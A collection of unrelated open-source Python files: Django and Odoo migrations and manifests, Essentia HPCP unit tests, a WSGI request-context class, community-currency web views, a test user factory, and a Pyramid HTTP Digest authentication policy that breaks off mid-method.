                ('anon_permissions', djorm_pgarray.fields.TextArrayField(choices=[('view_project', 'View project'), ('view_milestones', 'View milestones'), ('view_us', 'View user stories'), ('view_tasks', 'View tasks'), ('view_issues', 'View issues'), ('view_wiki_pages', 'View wiki pages'), ('view_wiki_links', 'View wiki links')], dbtype='text', default=[], verbose_name='anonymous permissions')),
                ('public_permissions', djorm_pgarray.fields.TextArrayField(choices=[('view_project', 'View project'), ('view_milestones', 'View milestones'), ('view_us', 'View user stories'), ('view_issues', 'View issues'), ('vote_issues', 'Vote issues'), ('view_tasks', 'View tasks'), ('view_wiki_pages', 'View wiki pages'), ('view_wiki_links', 'View wiki links'), ('request_membership', 'Request membership'), ('add_us_to_project', 'Add user story to project'), ('add_comments_to_us', 'Add comments to user stories'), ('add_comments_to_task', 'Add comments to tasks'), ('add_issue', 'Add issues'), ('add_comments_issue', 'Add comments to issues'), ('add_wiki_page', 'Add wiki page'), ('modify_wiki_page', 'Modify wiki page'), ('add_wiki_link', 'Add wiki link'), ('modify_wiki_link', 'Modify wiki link')], dbtype='text', default=[], verbose_name='user permissions')),
                ('is_private', models.BooleanField(default=False, verbose_name='is private')),
                ('tags_colors', djorm_pgarray.fields.TextArrayField(dbtype='text', dimension=2, default=[], null=False, verbose_name='tags colors')),
            ],
            options={
                'ordering': ['name'],
                'verbose_name_plural': 'projects',
                'permissions': (('view_project', 'Can view project'),),
                'verbose_name': 'project',
            },
            bases=(models.Model,),
        ),
        migrations.AddField(
            model_name='project',
            name='members',
            field=models.ManyToManyField(to=settings.AUTH_USER_MODEL, related_name='projects', verbose_name='members', through='projects.Membership'),
            preserve_default=True,
        ),
        migrations.AddField(
            model_name='project',
            name='owner',
            field=models.ForeignKey(to=settings.AUTH_USER_MODEL, related_name='owned_projects', verbose_name='owner'),
            preserve_default=True,
        ),

        migrations.AddField(
            model_name='membership',
            name='user',
            field=models.ForeignKey(blank=True, default=None, to=settings.AUTH_USER_MODEL, null=True, related_name='memberships'),
            preserve_default=True,
        ),

        # default=1 with preserve_default=False: 1 is only used to fill
        # existing rows during the migration, not kept as a model default.
        migrations.AddField(
            model_name='membership',
            name='project',
            field=models.ForeignKey(default=1, to='projects.Project', related_name='memberships'),
            preserve_default=False,
        ),

        migrations.AlterUniqueTogether(
            name='membership',
            unique_together=set([('user', 'project')]),
        ),

        migrations.AddField(
            model_name='membership',
            name='role',
            field=models.ForeignKey(related_name='memberships', to='users.Role', default=1),
            preserve_default=False,
        ),
    ]

#!/usr/bin/env python

# Copyright (C) 2006-2016  Music Technology Group - Universitat Pompeu Fabra
#
# This file is part of Essentia
#
# Essentia is free software: you can redistribute it and/or modify it under
# the terms of the GNU Affero General Public License as published by the Free
# Software Foundation (FSF), either version 3 of the License, or (at your
# option) any later version.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
# details.
#
# You should have received a copy of the Affero GNU General Public License
# version 3 along with this program. If not, see http://www.gnu.org/licenses/



from essentia_test import *

class TestHPCP(TestCase):
    """Unit tests for the HPCP (Harmonic Pitch Class Profile) algorithm.

    HPCP maps spectral peaks (frequencies, magnitudes) onto a 12-bin pitch
    class profile; bin 0 corresponds to the reference frequency (A by default).
    """

    def testEmpty(self):
        # No peaks at all -> all-zero profile.
        hpcp = HPCP()([], [])
        self.assertEqualVector(hpcp, [0.]*12)

    def testZeros(self):
        # Zero-frequency / zero-magnitude peaks contribute nothing.
        hpcp = HPCP()([0]*10, [0]*10)
        self.assertEqualVector(hpcp, [0.]*12)

    def testSin440(self):
        # Tests whether a real audio signal of one pure tone gets read as a
        # single semitone activation, and gets read into the right pcp bin
        sampleRate = 44100
        audio = MonoLoader(filename = join(testdata.audio_dir, 'generated/synthesised/sin440_0db.wav'),
                           sampleRate = sampleRate)()
        speaks = SpectralPeaks(sampleRate = sampleRate,
                               maxPeaks = 1,
                               maxFrequency = sampleRate/2,
                               minFrequency = 0,
                               magnitudeThreshold = 0,
                               orderBy = 'magnitude')
        (freqs, mags) = speaks(Spectrum()(audio))
        hpcp = HPCP()(freqs, mags)
        self.assertEqualVector(hpcp, [1.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.])

    def testAllSemitones(self):
        # Tests whether a spectral peak output of 12 consecutive semitones
        # yields a HPCP of all 1's
        tonic = 440
        freqs = [(tonic * 2**(x/12.)) for x in range(12)]
        mags = [1] * 12
        hpcp = HPCP()(freqs, mags)
        self.assertEqualVector(hpcp, [1.,1.,1.,1.,1.,1.,1.,1.,1.,1.,1.,1.])

    def testSubmediantPosition(self):
        # Make sure that the submediant of a key based on 440 is in the
        # correct location (submediant was randomly selected from all the
        # tones)
        tonic = 440
        submediant = tonic * 2**(9./12.)
        hpcp = HPCP()([submediant], [1])

        self.assertEqualVector(hpcp, [0.,0.,0.,0.,0.,0.,0.,0.,0.,1.,0.,0.])

    def testMaxShifted(self):
        # Tests whether a HPCP reading with only the dominant semitone
        # activated is correctly shifted so that the dominant is at the
        # position 0
        tonic = 440
        dominant = tonic * 2**(7./12.)
        hpcp = HPCP(maxShifted=True)([dominant], [1])

        self.assertEqualVector(hpcp, [1.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.])

    def chordHelper(self, half_steps, tunning, strength):
        # Build a 3-note chord from semitone offsets relative to the tuning
        # frequency and check that only the corresponding bins are activated.
        notes = [tunning*(2.**(half_steps[i]/12.)) for i in range(len(half_steps))]
        hpcp = HPCP(maxShifted=False)([notes[0], notes[1], notes[2]], strength)
        for i in range(len(hpcp)):
            if i in half_steps: self.assertTrue(hpcp[i]>0)
            elif (i - 12) in half_steps: self.assertTrue(hpcp[i]>0)
            else: self.assertEqual(hpcp[i], 0)

    def testChord(self):
        tunning = 440
        AMajor = [0, 4, 7] # AMajor = A4-C#5-E5
        self.chordHelper(AMajor, tunning, [1,1,1])
        CMajor = [3, -4, -2] # CMajor = C5-F4-G4
        self.chordHelper(CMajor, tunning, [1,1,1])
        CMajor = [-4, 3, -2] # CMajor = C5-F4-G4
        self.chordHelper(CMajor, tunning, [1,0.5,0.2])
        CMajor = [-4, -2, 3] # CMajor = C5-F4-G4
        self.chordHelper(CMajor, tunning, [1,0.5,0.2])
        CMajor = [3, 8, 10] # CMajor = C5-F5-G5
        self.chordHelper(CMajor, tunning, [1,0.5,0.2])
        AMinor = [0, 3, 7] # AMinor = A4-C5-E5
        self.chordHelper(AMinor, tunning, [1,0.5,0.2])
        CMinor = [3, 6, 10] # CMinor = C5-E5-G5
        self.chordHelper(CMinor, tunning, [1,0.5,0.2])


    # Test of various parameter logical bounds

    def testLowFrequency(self):
        # Peaks below minFrequency are ignored.
        hpcp = HPCP(minFrequency=100, maxFrequency=1000)([99], [1])
        self.assertEqualVector(hpcp, [0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.])

    def testHighFrequency(self):
        # Peaks above maxFrequency are ignored.
        hpcp = HPCP(minFrequency=100, maxFrequency=1000)([1001], [1])
        self.assertEqualVector(hpcp, [0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.,0.])

    def testSmallMinRange(self):
        self.assertConfigureFails(HPCP(), {'minFrequency':1, 'splitFrequency':200})

    def testSmallMaxRange(self):
        self.assertConfigureFails(HPCP(), {'maxFrequency':1199, 'splitFrequency':1000})

    def testSmallMinMaxRange(self):
        self.assertConfigureFails(HPCP(), {'bandPreset':False, 'maxFrequency':200, 'minFrequency':1})

    def testSizeNonmultiple12(self):
        # Profile size must be a multiple of 12 semitones.
        self.assertConfigureFails(HPCP(), {'size':13})

    def testHarmonics(self):
        # Regression test for the 'harmonics' parameter
        tone = 100. # arbitrary frequency [Hz]
        freqs = [tone, tone*2, tone*3, tone*4]
        mags = [1]*4

        hpcpAlg = HPCP(minFrequency=50, maxFrequency=500, bandPreset=False, harmonics=3)
        hpcp = hpcpAlg(freqs, mags)
        expected = [0., 0., 0., 0.1340538263, 0., 0.2476127148, 0., 0., 0., 0., 1., 0.]
        self.assertAlmostEqualVector(hpcp, expected, 1e-4)

    def testRegression(self):
        # Just makes sure algorithm does not crash on a real data source. This
        # test is not really looking for correctness. Maybe consider revising
        # it.
        inputSize = 512
        sampleRate = 44100

        audio = MonoLoader(filename = join(testdata.audio_dir, join('recorded', 'musicbox.wav')),
                           sampleRate = sampleRate)()

        fc = FrameCutter(frameSize = inputSize,
                         hopSize = inputSize)

        windowingAlg = Windowing(type = 'blackmanharris62')
        specAlg = Spectrum(size=inputSize)
        sPeaksAlg = SpectralPeaks(sampleRate = sampleRate,
                               maxFrequency = sampleRate/2,
                               minFrequency = 0,
                               orderBy = 'magnitude')

        hpcpAlg = HPCP(minFrequency=50, maxFrequency=500, bandPreset=False, harmonics=3)
        frame = fc(audio)
        while len(frame) != 0:
            spectrum = specAlg(windowingAlg(frame))
            (freqs, mags) = sPeaksAlg(spectrum)
            hpcp = hpcpAlg(freqs,mags)
            # The profile must stay finite for every frame of real audio.
            self.assertTrue(not any(numpy.isnan(hpcp)))
            self.assertTrue(not any(numpy.isinf(hpcp)))
            frame = fc(audio)


# Collect all TestHPCP cases into a suite (allTests comes from essentia_test).
suite = allTests(TestHPCP)

if __name__ == '__main__':
    TextTestRunner(verbosity=2).run(suite)

# -*- coding: utf-8 -*-
# Copyright 2016 Onestein (<http://www.onestein.eu>)
# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl.html).

# Odoo module manifest: ships a data file that disables the
# "Log in with Odoo.com" OAuth provider (depends on auth_oauth).
{
    'name': 'OAuth2 Disable Login with Odoo.com',
    'version': '10.0.1.0.0',
    'category': 'Tools',
    'author': 'Onestein',
    'license': 'AGPL-3',
    'depends': ['auth_oauth'],
    'data': [
        'data/auth_oauth_data.xml',
    ],
}

# -*- coding: utf-8 -*-
# Generated by Django 1.11.2 on 2017-11-22 07:11
from __future__ import unicode_literals

from django.core.management.sql import emit_post_migrate_signal
from django.db import migrations


def add_executive_group(apps, schema_editor):
    """Create the 'executive' auth group and grant it learning-unit access."""
    db_alias = schema_editor.connection.alias
    # Emit post_migrate so auth permissions exist before we look them up.
    emit_post_migrate_signal(1, False, db_alias)
    Group = apps.get_model('auth', 'Group')
    Permission = apps.get_model('auth', 'Permission')
    executive_group, was_created = Group.objects.get_or_create(name='executive')
    if not was_created:
        # Group already existed: leave its permissions untouched.
        return
    # Learning unit access
    permission = Permission.objects.get(codename='can_access_learningunit')
    executive_group.permissions.add(permission)


class Migration(migrations.Migration):
    """Data migration seeding the 'executive' group with its permissions."""
    dependencies = [
        ('base', '0207_auto_20171220_1035'),
    ]

    operations = [
        # elidable=True: this data migration may be dropped when squashing.
        migrations.RunPython(add_executive_group, elidable=True),
    ]

# -*- coding: utf-8 -*-

from openerp import models, fields


class AccountBankStatementLine(models.Model):
    """Relax the statement line 'name' (Memo) field: optional, empty default."""
    _inherit = "account.bank.statement.line"

    name = fields.Char(
        string='Memo',
        required=False,  # core declares this field required; make it optional
        default="",
    )

# -*- coding: utf-8 -*-


# Etalage -- Open Data POIs portal
# By: Emmanuel Raviart <eraviart@easter-eggs.com>
#
# Copyright (C) 2011, 2012 Easter-eggs
# http://gitorious.org/infos-pratiques/etalage
#
# This file is part of Etalage.
#
# Etalage is free software; you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# Etalage is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program.  If not, see <http://www.gnu.org/licenses/>.


"""Context loaded and saved in WSGI requests"""


import gettext

import webob

from . import conf


__all__ = ['Ctx', 'null_ctx']


class Ctx(object):
    """Hierarchical request context.

    Attribute lookups fall back along the ``_parent`` chain and finally to
    ``default_values``.  The attributes listed in ``env_keys`` are mirrored
    into the WSGI environ (under the 'etalage' key) so they survive across
    sub-requests.
    """
    _parent = None
    default_values = dict(
        _lang = None,
        _scopes = UnboundLocalError,  # sentinel: "scopes not set"
        _translator = None,
        base_categories_slug = None,
        category_tags_slug = None,
        container_base_url = None,
        distance = None,  # Max distance in km
        gadget_id = None,
        hide_directory = False,
        req = None,
        subscriber = None,
        )
    # Attributes persisted into req.environ['etalage'].
    env_keys = ('_lang', '_scopes', '_translator')

    def __init__(self, req = None):
        # Restore any env_keys values previously stored in the WSGI environ.
        if req is not None:
            self.req = req
            etalage_env = req.environ.get('etalage', {})
            for key in object.__getattribute__(self, 'env_keys'):
                value = etalage_env.get(key)
                if value is not None:
                    setattr(self, key, value)

    def __getattribute__(self, name):
        # Lookup order: own __dict__/class, then parent chain, then defaults.
        try:
            return object.__getattribute__(self, name)
        except AttributeError:
            parent = object.__getattribute__(self, '_parent')
            if parent is None:
                default_values = object.__getattribute__(self, 'default_values')
                if name in default_values:
                    return default_values[name]
                raise
            return getattr(parent, name)

    @property
    def _(self):
        # Shorthand for the translation function of the current translator.
        return self.translator.ugettext

    def blank_req(self, path, environ = None, base_url = None, headers = None, POST = None, **kw):
        """Build a blank webob request carrying over this context's env_keys."""
        env = environ.copy() if environ else {}
        etalage_env = env.setdefault('etalage', {})
        for key in self.env_keys:
            value = getattr(self, key)
            if value is not None:
                etalage_env[key] = value
        return webob.Request.blank(path, environ = env, base_url = base_url, headers = headers, POST = POST, **kw)

    def get_containing(self, name, depth = 0):
        """Return the n-th (n = ``depth``) context containing attribute named ``name``."""
        ctx_dict = object.__getattribute__(self, '__dict__')
        if name in ctx_dict:
            if depth <= 0:
                return self
            depth -= 1
        parent = ctx_dict.get('_parent')
        if parent is None:
            return None
        return parent.get_containing(name, depth = depth)

    def get_inherited(self, name, default = UnboundLocalError, depth = 1):
        """Return ``name`` from the n-th containing context, or ``default``."""
        ctx = self.get_containing(name, depth = depth)
        if ctx is None:
            if default is UnboundLocalError:
                raise AttributeError('Attribute %s not found in %s' % (name, self))
            return default
        return object.__getattribute__(ctx, name)

    def iter(self):
        # Yield self, then every ancestor up the parent chain.
        yield self
        parent = object.__getattribute__(self, '_parent')
        if parent is not None:
            for ancestor in parent.iter():
                yield ancestor

    def iter_containing(self, name):
        # Yield every context in the chain whose own __dict__ defines name.
        ctx_dict = object.__getattribute__(self, '__dict__')
        if name in ctx_dict:
            yield self
        parent = ctx_dict.get('_parent')
        if parent is not None:
            for ancestor in parent.iter_containing(name):
                yield ancestor

    def iter_inherited(self, name):
        # Yield each chain value of name, nearest first.
        for ctx in self.iter_containing(name):
            yield object.__getattribute__(ctx, name)

    def lang_del(self):
        del self._lang
        if self.req is not None and self.req.environ.get('etalage') is not None \
                and '_lang' in self.req.environ['etalage']:
            del self.req.environ['etalage']['_lang']

    def lang_get(self):
        # Lazily default to French and persist the choice in the environ.
        if self._lang is None:
            # self._lang = self.req.accept_language.best_matches('en-US') if self.req is not None else []
            # Note: Don't forget to add country-less language code when only a "language-COUNTRY" code is given.
            self._lang = ['fr-FR', 'fr']
            if self.req is not None:
                self.req.environ.setdefault('etalage', {})['_lang'] = self._lang
        return self._lang

    def lang_set(self, lang):
        self._lang = lang
        if self.req is not None:
            self.req.environ.setdefault('etalage', {})['_lang'] = self._lang
        # Reinitialize translator for new languages.
        if self._translator is not None:
            # Don't del self._translator, because attribute _translator can be defined in a parent.
            self._translator = None
            if self.req is not None and self.req.environ.get('etalage') is not None \
                    and '_translator' in self.req.environ['etalage']:
                del self.req.environ['etalage']['_translator']

    lang = property(lang_get, lang_set, lang_del)

    def new(self, **kwargs):
        """Create a child context inheriting from self, overriding kwargs."""
        ctx = Ctx()
        ctx._parent = self
        for name, value in kwargs.iteritems():
            setattr(ctx, name, value)
        return ctx

    @property
    def parent(self):
        return object.__getattribute__(self, '_parent')

    def scopes_del(self):
        # NOTE(review): scopes use the 'wenoit_etalage' environ key while lang
        # and translator use 'etalage' — presumably intentional legacy; confirm.
        del self._scopes
        if self.req is not None and self.req.environ.get('wenoit_etalage') is not None \
                and '_scopes' in self.req.environ['wenoit_etalage']:
            del self.req.environ['wenoit_etalage']['_scopes']

    def scopes_get(self):
        return self._scopes

    def scopes_set(self, scopes):
        self._scopes = scopes
        if self.req is not None:
            self.req.environ.setdefault('wenoit_etalage', {})['_scopes'] = scopes

    scopes = property(scopes_get, scopes_set, scopes_del)

    @property
    def session(self):
        # Beaker session, when the middleware is installed.
        return self.req.environ.get('beaker.session') if self.req is not None else None

    @property
    def translator(self):
        """Get a valid translator object from one or several languages names."""
        if self._translator is None:
            languages = self.lang
            if not languages:
                return gettext.NullTranslations()
            if not isinstance(languages, list):
                languages = [languages]
            # Chain translations: later entries take precedence, earlier ones
            # become fallbacks.
            translator = gettext.NullTranslations()
            i18n_dir_by_plugin_name = conf['i18n_dir_by_plugin_name'] or {}
            for name, i18n_dir in [
                    ('biryani', conf['biryani_i18n_dir']),
                    (conf['package_name'], conf['i18n_dir']),
                    ] + sorted(i18n_dir_by_plugin_name.iteritems()):
                if name is not None and i18n_dir is not None:
                    translator = new_translator(name, i18n_dir, languages, fallback = translator)
            self._translator = translator
        return self._translator


# Shared default context used when no request-specific context is available.
null_ctx = Ctx()
null_ctx.lang = ['fr-FR', 'fr']


def new_translator(domain, localedir, languages, fallback = None):
    """Build a gettext translator for *domain* under *localedir*.

    A missing catalog yields a NullTranslations (fallback = True); when
    *fallback* is given it is chained behind the new translator.
    """
    translation = gettext.translation(domain, localedir, fallback = True, languages = languages)
    if fallback is not None:
        translation.add_fallback(fallback)
    return translation

from django.contrib.auth.decorators import login_required
from django.shortcuts import get_object_or_404
from django.http import HttpResponseRedirect, Http404
from django.db.models import Q
from django.contrib import messages

from cc.general.util import render
import cc.ripple.api as ripple
from cc.profile.models import Profile
from cc.relate.forms import EndorseForm, AcknowledgementForm
from cc.relate.models import Endorsement
from cc.feed.models import FeedItem
from cc.general.mail import send_notification
from django.utils.translation import ugettext as _

# Flash messages shown to users after relate actions.
# NOTE(review): these are translated with ugettext at module-import time, so
# the active language is frozen at import; ugettext_lazy may be intended —
# confirm before relying on per-request translation.
MESSAGES = {
    'endorsement_saved': _("Endorsement saved."),
    'endorsement_deleted': _("Endorsement deleted."),
    'acknowledgement_sent': _("Acknowledgement sent."),
}

@login_required
@render()
def endorse_user(request, recipient_username):
    """
    Create, update or delete the logged-in user's endorsement of another user.

    GET shows the form; POST saves the endorsement, or deletes it when the
    'delete' button was pressed.  Returns locals() because @render uses the
    local variables as the template context — do not rename locals casually.
    """
    recipient = get_object_or_404(Profile, user__username=recipient_username)
    if recipient == request.profile:
        raise Http404()  # Users cannot endorse themselves.
    try:
        endorsement = Endorsement.objects.get(
            endorser=request.profile, recipient=recipient)
    except Endorsement.DoesNotExist:
        endorsement = None
    if request.method == 'POST':
        if 'delete' in request.POST and endorsement:
            endorsement.delete()
            messages.info(request, MESSAGES['endorsement_deleted'])
            # The deleted instance keeps its field values in memory, so
            # reading recipient for the redirect is safe.
            return HttpResponseRedirect(
                endorsement.recipient.get_absolute_url())
        form = EndorseForm(request.POST, instance=endorsement,
                           endorser=request.profile, recipient=recipient)
        if form.is_valid():
            is_new = endorsement is None
            endorsement = form.save()
            # Notify only on first-time endorsements, not on edits.
            if is_new:
                send_endorsement_notification(endorsement)
            messages.info(request, MESSAGES['endorsement_saved'])
            return HttpResponseRedirect(endorsement.get_absolute_url())
    else:
        form = EndorseForm(instance=endorsement, endorser=request.profile,
                           recipient=recipient)
    profile = recipient  # For profile_base.html.
    return locals()

def send_endorsement_notification(endorsement):
    """Email the endorsement's recipient that the endorser has endorsed them."""
    subject = _("%s has endorsed you on Villages.cc") % endorsement.endorser
    template = 'endorsement_notification_email.txt'
    context = {'endorsement': endorsement}
    send_notification(
        subject, endorsement.endorser, endorsement.recipient, template, context)

@login_required
@render()
def endorsement(request, endorsement_id):
    """Display a single endorsement; context is locals(), consumed by @render."""
    endorsement = get_object_or_404(Endorsement, pk=endorsement_id)
    return locals()
    
@login_required
@render()
def relationships(request):
    """List the logged-in user's Ripple accounts; context is locals() via @render."""
    accounts = ripple.get_user_accounts(request.profile)
    return locals()

@login_required
@render()
def relationship(request, partner_username):
    """
    Show the ledger between the logged-in user and *partner_username*.

    Context is locals() (consumed by @render); do not rename local variables.
    """
    partner = get_object_or_404(Profile, user__username=partner_username)
    if partner == request.profile:
        raise Http404  # Can't have relationship with yourself.
    account = request.profile.account(partner)
    if account:
        entries = account.entries 
        balance = account.balance
    else:
        # No shared account yet: render an empty ledger.
        entries = []
        balance = 0
    profile = partner  # For profile_base.html.
    return locals()

@login_required
@render()
def acknowledge_user(request, recipient_username):
    """
    Send an acknowledgement (Ripple payment) from the logged-in user.

    Context is locals() (consumed by @render); do not rename local variables.
    """
    recipient = get_object_or_404(Profile, user__username=recipient_username)
    if recipient == request.profile:
        raise Http404  # Users cannot acknowledge themselves.
    # TODO: Don't recompute max_amount on form submit?  Cache, or put in form
    # as hidden field?
    max_amount = ripple.max_payment(request.profile, recipient)
    if request.method == 'POST':
        form = AcknowledgementForm(request.POST, max_ripple=max_amount)
        if form.is_valid():
            acknowledgement = form.send_acknowledgement(
                request.profile, recipient)
            send_acknowledgement_notification(acknowledgement)
            messages.info(request, MESSAGES['acknowledgement_sent'])
            return HttpResponseRedirect(acknowledgement.get_absolute_url())
    else:
        # Allow pre-filling the form through query-string parameters.
        form = AcknowledgementForm(max_ripple=max_amount, initial=request.GET)
    can_ripple = max_amount > 0
    profile = recipient  # For profile_base.html.
    return locals()

def send_acknowledgement_notification(acknowledgement):
    """Email the recipient that the payer has acknowledged them."""
    subject = _("%s has acknowledged you on Villages.cc") % (
        acknowledgement.payer)
    template = 'acknowledgement_notification_email.txt'
    context = {'acknowledgement': acknowledgement}
    send_notification(
        subject, acknowledgement.payer, acknowledgement.recipient, template,
        context)

@login_required
@render()
def view_acknowledgement(request, payment_id):
    """
    Show a payment to its participants, split into sent and received entries.

    Context is locals() (consumed by @render); non-participants get a 404.
    """
    try:
        payment = ripple.get_payment(payment_id)
    except ripple.RipplePayment.DoesNotExist:
        raise Http404
    entries = payment.entries_for_user(request.profile)
    if not entries:
        raise Http404  # Non-participants don't get to see anything.
    # Negative amounts are money the viewer sent; non-negative, money received.
    sent_entries = []
    received_entries = []
    for entry in entries:
        if entry.amount < 0:
            sent_entries.append(entry)
        else:
            received_entries.append(entry)
    return locals()

# -*- coding: utf-8 -*-
##############################################################################
#
#    Ingenieria ADHOC - ADHOC SA
#    https://launchpad.net/~ingenieria-adhoc
#
#    This program is free software: you can redistribute it and/or modify
#    it under the terms of the GNU Affero General Public License as
#    published by the Free Software Foundation, either version 3 of the
#    License, or (at your option) any later version.
#
#    This program is distributed in the hope that it will be useful,
#    but WITHOUT ANY WARRANTY; without even the implied warranty of
#    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#    GNU Affero General Public License for more details.
#
#    You should have received a copy of the GNU Affero General Public License
#    along with this program.  If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################

import waybill
import wizard
import travel
import vehicle
import requirement
import res_partner
import waybill_expense
import account_invoice

# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:

# Copyright 2015-2018 Camptocamp SA
# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl.html)
from . import mass_reconcile
from . import advanced_reconciliation

# -*- coding: utf-8 -*-
# © 2014 Elico Corp (https://www.elico-corp.com)
# Licence AGPL-3.0 or later(http://www.gnu.org/licenses/agpl.html)


import invoice

import factory

from .models import User

# Plaintext password assigned to every factory-created user (hashed below).
USER_PASSWORD = "2fast2furious"


class UserFactory(factory.DjangoModelFactory):
    # Test-data factory for the project's User model.
    name = "John Doe"
    # Sequence keeps emails unique across generated users.
    email = factory.Sequence(lambda n: "john{}@example.com".format(n))
    # Hash the password via User.set_password after instance creation.
    password = factory.PostGenerationMethodCall('set_password', USER_PASSWORD)
    gender = "male"

    class Meta:
        model = User

#!/usr/bin/env python
# -*- coding: utf-8; tab-width: 4; indent-tabs-mode: t -*-
#
# NetProfile: Authentication routines
# © Copyright 2013-2014 Alex 'Unik' Unigovsky
#
# This file is part of NetProfile.
# NetProfile is free software: you can redistribute it and/or
# modify it under the terms of the GNU Affero General Public
# License as published by the Free Software Foundation, either
# version 3 of the License, or (at your option) any later
# version.
#
# NetProfile is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General
# Public License along with NetProfile. If not, see
# <http://www.gnu.org/licenses/>.

from __future__ import (
	unicode_literals,
	print_function,
	absolute_import,
	division
)

import hashlib
import random
import string
import time

from zope.interface import implementer
from pyramid.interfaces import IAuthenticationPolicy
from pyramid.security import (
	Authenticated,
	Everyone
)

class PluginPolicySelected(object):
	"""Pyramid event emitted when an authentication policy has been chosen for a request."""

	def __init__(self, request, policy):
		"""Record the *request* being served and the *policy* selected for it."""
		self.policy = policy
		self.request = request

@implementer(IAuthenticationPolicy)
class PluginAuthenticationPolicy(object):
	"""Composite policy that delegates to per-route-prefix policies, with a default."""

	def __init__(self, default, routes=None):
		"""*default* handles requests matched by no prefix; *routes* maps path prefixes to policies."""
		self._default = default
		self._routes = {} if routes is None else routes

	def add_plugin(self, route, policy):
		"""Register *policy* for the path prefix *route*."""
		self._routes[route] = policy

	def match(self, request):
		"""Select, cache and announce the policy for *request* (longest prefix wins)."""
		if hasattr(request, 'auth_policy'):
			return request.auth_policy
		best = None
		best_len = 0
		path = request.path
		for prefix, policy in self._routes.items():
			prefix_len = len(prefix)
			if prefix_len <= best_len:
				continue
			if path[:prefix_len] != prefix:
				continue
			# Only match on a path-segment boundary: '/foo' must not match '/foobar'.
			if len(path) > prefix_len and path[prefix_len:prefix_len + 1] != '/':
				continue
			best = policy
			best_len = prefix_len
		request.auth_policy = best if best else self._default
		request.registry.notify(PluginPolicySelected(request, request.auth_policy))
		return request.auth_policy

	def authenticated_userid(self, request):
		"""Delegate to the matched policy."""
		return self.match(request).authenticated_userid(request)

	def unauthenticated_userid(self, request):
		"""Delegate to the matched policy."""
		return self.match(request).unauthenticated_userid(request)

	def effective_principals(self, request):
		"""Delegate to the matched policy."""
		return self.match(request).effective_principals(request)

	def remember(self, request, principal, **kw):
		"""Delegate to the matched policy."""
		return self.match(request).remember(request, principal, **kw)

	def forget(self, request):
		"""Delegate to the matched policy."""
		return self.match(request).forget(request)

_TOKEN_FILTER_MAP = (
	[chr(n) for n in range(32)] +
	[chr(127), '\\', '"']
)
_TOKEN_FILTER_MAP = dict.fromkeys(_TOKEN_FILTER_MAP, None)

def _filter_token(tok):
	"""Return *tok* as a string with characters unsafe for quoted header values stripped."""
	text = str(tok)
	return text.translate(_TOKEN_FILTER_MAP)

def _format_kvpairs(**kwargs):
	"""Render keyword arguments as comma-separated 'key="value"' pairs with sanitized values."""
	pairs = ('{0!s}="{1}"'.format(key, _filter_token(value))
		for (key, value) in kwargs.items())
	return ', '.join(pairs)

def _generate_nonce(ts, secret, salt=None, chars=string.hexdigits.upper()):
	# TODO: Add IP-address to nonce
	if not salt:
		try:
			rng = random.SystemRandom()
		except NotImplementedError:
			rng = random
		salt = ''.join(rng.choice(chars) for i in range(16))
	ctx = hashlib.md5(('%s:%s:%s' % (ts, salt, secret)).encode())
	return ('%s:%s:%s' % (ts, salt, ctx.hexdigest()))

def _is_valid_nonce(nonce, secret):
	"""Return True when *nonce* was produced by _generate_nonce with *secret*."""
	parts = nonce.split(':')
	if len(parts) != 3:
		return False
	# Recompute from the embedded timestamp and salt; tampering changes the hash.
	return nonce == _generate_nonce(parts[0], secret, parts[1])

def _generate_digest_challenge(ts, secret, realm, opaque, stale=False):
	"""Build the value of a WWW-Authenticate 'Digest ...' challenge header."""
	kvpairs = _format_kvpairs(
		realm=realm,
		qop='auth',
		nonce=_generate_nonce(ts, secret),
		opaque=opaque,
		algorithm='MD5',
		stale='true' if stale else 'false'
	)
	return 'Digest %s' % (kvpairs,)

def _add_www_authenticate(request, secret, realm):
	"""Attach a digest challenge to the response unless one is already present."""
	response = request.response
	if response.www_authenticate:
		return
	response.www_authenticate = _generate_digest_challenge(
		round(time.time()), secret, realm, 'NPDIGEST')

def _parse_authorization(request, secret, realm):
	"""Return the parsed Digest Authorization params, or None after issuing a challenge.

	Rejects missing/non-Digest headers and headers lacking any required field
	(or carrying a foreign opaque value).
	"""
	authz = request.authorization
	if (not authz) or (len(authz) != 2) or (authz[0] != 'Digest'):
		_add_www_authenticate(request, secret, realm)
		return None
	params = authz[1]
	# Default algorithm per RFC 2617 when the client omits it.
	params.setdefault('algorithm', 'MD5')
	for field in ('username', 'realm', 'nonce', 'uri', 'response', 'cnonce', 'nc', 'opaque'):
		if (field not in params) or ((field == 'opaque') and (params['opaque'] != 'NPDIGEST')):
			_add_www_authenticate(request, secret, realm)
			return None
	return params

@implementer(IAuthenticationPolicy)
class DigestAuthenticationPolicy(object):
	"""Pyramid authentication policy implementing HTTP Digest auth (RFC 2617)."""

	def __init__(self, secret, callback, realm='Realm'):
		# secret: server-side key used to generate and validate nonces.
		# callback(params, request): returns a sequence of group principals
		#   (possibly empty) when the credentials are valid, or None otherwise.
		self.secret = secret
		self.callback = callback
		self.realm = realm

	def authenticated_userid(self, request):
		"""Return 'u:<username>' when the digest response validates, else None."""
		params = _parse_authorization(request, self.secret, self.realm)
		if params is None:
			return None
		if not _is_valid_nonce(params['nonce'], self.secret):
			_add_www_authenticate(request, self.secret, self.realm)
			return None
		userid = params['username']
